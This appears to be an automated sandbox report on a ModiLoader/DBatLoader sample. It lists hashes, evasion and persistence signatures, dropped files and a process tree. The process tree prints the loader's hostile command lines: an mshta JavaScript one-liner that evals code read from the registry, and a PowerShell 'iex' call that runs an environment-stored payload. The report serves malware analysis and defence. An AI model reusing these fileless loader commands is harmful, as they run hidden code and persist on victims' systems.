Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
27-05-2024 21:55
General
-
Target
7aabfe6f80c3fc43c2d6cf0f31c40abe_JaffaCakes118.exe
-
Size
407KB
-
MD5
7aabfe6f80c3fc43c2d6cf0f31c40abe
-
SHA1
bd581b4eacd6a4bf37510f03d0c495f61895e953
-
SHA256
a5e0b62351e4fd6c64430b2de629920dfa97e61bb75fd4f06fec664d2b424ac8
-
SHA512
3d4171cf258efb4b8dffe9a97aebcece82030ee720e28a02823867c7056f46f49c641d2ce9fc3e1975678844c8b3663e3c6b266d2f9edaaf2efbf8d1a6aee143
-
SSDEEP
6144:/BemJ2TYhimZQWM3Ac7zfW2geZToVBkjM+jcBCvvU83FLOV3bDOz6ABivpPF/:/B0T2imZEQcX+2g0ToVBIcIvvU8dudJr
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 51 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 29 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7aabfe6f80c3fc43c2d6cf0f31c40abe_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\7aabfe6f80c3fc43c2d6cf0f31c40abe_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7aabfe6f80c3fc43c2d6cf0f31c40abe_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\7aabfe6f80c3fc43c2d6cf0f31c40abe_JaffaCakes118.exe2⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:aa0vq2kf="AI";K3o=new%20ActiveXObject("WScript.Shell");xC6O6i="LE";HG7Xs=K3o.RegRead("HKLM\\software\\Wow6432Node\\KTTKMih\\lCjgoE87");XLOpqa4="iBwCol";eval(HG7Xs);vN9wuBmK="f01";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hfxxvlg2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\c55956\379df8.lnkFilesize
881B
MD5f72f9e38975845e1610def452e62c016
SHA1b9ab2604af59754fea0c3b63851a4adc6328aa6a
SHA25667c188934c49ea7221aa6c806ad0ff675bf1c51414794b296179e54df348fb99
SHA51246050c3b302e17398547eaee23f2cf295f8f6bbbc1c7fb37611cb10fa3706e0f8722f3f80f1acc2db0bebf9cf243ac1c80746a80a0225c4c2c3bff12ce1880c5
-
C:\Users\Admin\AppData\Local\c55956\4f746e.925876aFilesize
22KB
MD507f757b6f8e38eb9840d3c6735a7a297
SHA145e0381b1df9fa1cbac01e27535c8ff2f476a2df
SHA2566a6929331b2a32c9594b67a09e30d422470e33641545ade795e7e1458fd0a6a3
SHA51231c127c281c310fcfb84037839dfcac14af624243628beeb233c4ef920624050996c25537051d46487d73eaee661a8b671d958ebe990c6277799cabe0b898ab0
-
C:\Users\Admin\AppData\Local\c55956\ff1237.batFilesize
61B
MD5a4ee564ba17858e285c3daf96c530e67
SHA1c9d811ebf359babdd15ca5374ae6afb1b31401b8
SHA2569134562b968a0afd491534e7074a3ba744c630d819c4f0c199dc79668ad12e1a
SHA51274e316747b51b52cf8ccf57ed0f3c9a467c15d309d8de7fb905f918178d3b700d4a497e8cd9de355ee29a7a8faccec5bd3665896a96273176c0f07e343827124
-
C:\Users\Admin\AppData\Roaming\18be8e\b446ee.925876aFilesize
23KB
MD5844d52412593b42fa70a75d55279f595
SHA1fe7ace2c7cc481b842d9b806d7ae79fdf2f94555
SHA256058dc1a4904659961861b30ac67426e547c2ab57f8c2cc55ff99591703d585e8
SHA512e83e3c44abf5bdc96bdfe44bfde831e22e8d845fc94faba99fd85285f72d5f3faba2c45cc28306cf26285890711d315650ccd2c097011d3813429c894c743d48
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0815f.lnkFilesize
991B
MD5b957086135c8e75029baaf333f111ead
SHA168c1af2d8966b35db3f014d0630a712efe5b29b4
SHA256b12a6562e773a7df2121bb8e1fd91d6ef05cacf81645ce1bfa16a23bb5a20134
SHA51277ee29979c1ddaee4447138bb38bb879258e6286d8e33933ec5707b41ce31458dc7e6ac1ee6800dcf955f064412e2eb1c22c587abb396e7588013c21e721cad2
-
memory/1220-81-0x00000000002A0000-0x00000000003E1000-memory.dmpFilesize
1.3MB
-
memory/1220-80-0x00000000002A0000-0x00000000003E1000-memory.dmpFilesize
1.3MB
-
memory/1220-84-0x00000000002A0000-0x00000000003E1000-memory.dmpFilesize
1.3MB
-
memory/1220-83-0x00000000002A0000-0x00000000003E1000-memory.dmpFilesize
1.3MB
-
memory/1220-82-0x00000000002A0000-0x00000000003E1000-memory.dmpFilesize
1.3MB
-
memory/1672-2-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-13-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-19-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-20-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-16-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-15-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-14-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-18-0x0000000001DA0000-0x0000000001E76000-memory.dmpFilesize
856KB
-
memory/1672-0-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-4-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-6-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-8-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-10-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1672-12-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/2196-63-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-42-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-56-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-64-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-73-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-62-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-57-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-74-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-52-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-51-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-50-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-48-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-47-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-46-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-45-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-44-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-43-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-53-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-41-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-40-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-38-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-37-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-36-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-31-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-66-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-54-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-55-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-35-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-67-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-49-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-39-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2196-33-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2712-34-0x00000000062F0000-0x00000000063C6000-memory.dmpFilesize
856KB
-
memory/2712-32-0x0000000003000000-0x0000000005000000-memory.dmpFilesize
32.0MB
-
memory/2712-29-0x00000000062F0000-0x00000000063C6000-memory.dmpFilesize
856KB